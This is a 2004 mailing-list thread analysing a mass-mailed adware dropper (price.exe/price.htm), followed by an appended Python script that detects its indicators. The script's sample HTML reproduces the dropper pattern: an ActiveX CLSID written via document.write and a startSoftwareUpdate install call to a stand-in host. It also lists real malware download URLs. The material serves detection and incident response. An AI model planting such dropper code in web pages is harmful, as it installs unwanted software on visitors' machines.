Security Incidents mailing list archives

Re: New Mass Mailer Virus


From: "Thor" <thor () hammerofgod com>
Date: Mon, 9 Aug 2004 15:34:36 -0700

This one's not being caught by AV (Trend, anyway) -- The zip file appears to
have a randomized integer appended to the name.  I've seen both price2.zip
and price_8.zip.  Looks like Price.htm checks browser settings and does a
document.write to install under IE with
CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D; if Netscape, it launches and
installs trigger.UpdateEnabled, then it uses the trigger.startsoftwareupdate
method.

However, I show that as adware/spyware, not a Bagle variant... BargainBuddy,
specifically.  However, it does have probably 100 web sites hard-coded
into the exe that try to pull up www.domain.com/2.jpg.  It is always 2.jpg,
looks like, but I was not able to get to that file on any of the referenced
sites - got 404s on all but one, where I got "The image
"http://www.dynex.ru/2.jpg" cannot be displayed, because it contains errors."

Just cursory observations...
T



----- Original Message ----- 
From: "Jeff Pricher" <jeffpricher () yahoo com>
To: <incidents () securityfocus com>
Sent: Monday, August 09, 2004 2:19 PM
Subject: New Mass Mailer Virus




Looks like a new Bagle variant is on the loose. I saw several hundred in
my SMTP filter so far today. They have been arriving in a zip file with
price.exe and price.html as the payload. It took some digging to find any
information on the web for this and so far the best I've found is from SANS
and can be read here http://isc.sans.org/
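A small triage script for the indicators Thor describes above (the document.write/CLSID drop under IE, the trigger.UpdateEnabled / startSoftwareUpdate branch for Netscape, and the hard-coded .../2.jpg URLs in the exe). This is an added example, not code from the thread; the HTML and binary samples it scans are constructed stand-ins, not the real Price.htm or price.exe.

```python
import re

# Indicators taken from the description of Price.htm / price.exe in the thread.
KNOWN_CLSID = "018B7EC3-EECA-11d3-8E71-0000E82C6C0D"

DOC_WRITE_RE = re.compile(r"document\.write\s*\(", re.I)
CLSID_RE = re.compile(r"clsid:\s*\{?([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}?", re.I)
TRIGGER_RE = re.compile(r"trigger\.(UpdateEnabled|startSoftwareUpdate)", re.I)
# Only URLs whose final path component is exactly 2.jpg, as observed in the exe.
JPG_URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[A-Za-z0-9_.\-]+)*/2\.jpg", re.I)


def triage_html(html: str) -> dict:
    """Report which of the thread's HTML indicators are present in a page body."""
    clsids = {m.group(1).upper() for m in CLSID_RE.finditer(html)}
    has_write = bool(DOC_WRITE_RE.search(html))
    return {
        "document_write": has_write,
        "clsids": sorted(clsids),
        "known_clsid": KNOWN_CLSID.upper() in clsids,
        "netscape_trigger": bool(TRIGGER_RE.search(html)),
        # Dynamic write of an ActiveX object reference is the dropper pattern.
        "suspicious": has_write and bool(clsids),
    }


def extract_2jpg_urls(blob: bytes) -> list:
    """Pull hard-coded .../2.jpg URLs out of raw binary bytes, de-duplicated, in order."""
    seen = []
    for m in JPG_URL_RE.finditer(blob):
        url = m.group(0).decode("ascii", "ignore")
        if url not in seen:
            seen.append(url)
    return seen


# Constructed sample inputs (not the actual samples from the thread).
SAMPLE_HTML = """<html><script>
if (navigator.appName == "Microsoft Internet Explorer") {
  document.write('<object classid="clsid:018B7EC3-EECA-11d3-8E71-0000E82C6C0D"></object>');
} else {
  trigger.UpdateEnabled = true; trigger.startSoftwareUpdate("http://example.invalid/update");
}
</script></html>"""
SAMPLE_EXE = (b"\x00http://www.dynex.ru/2.jpg\x00http://www.example.com/2.jpg\x00"
              b"http://www.example.com/2.jpg\x00http://other.example.net/images/1.jpg\x00")

if __name__ == "__main__":
    print(triage_html(SAMPLE_HTML))
    print(extract_2jpg_urls(SAMPLE_EXE))
```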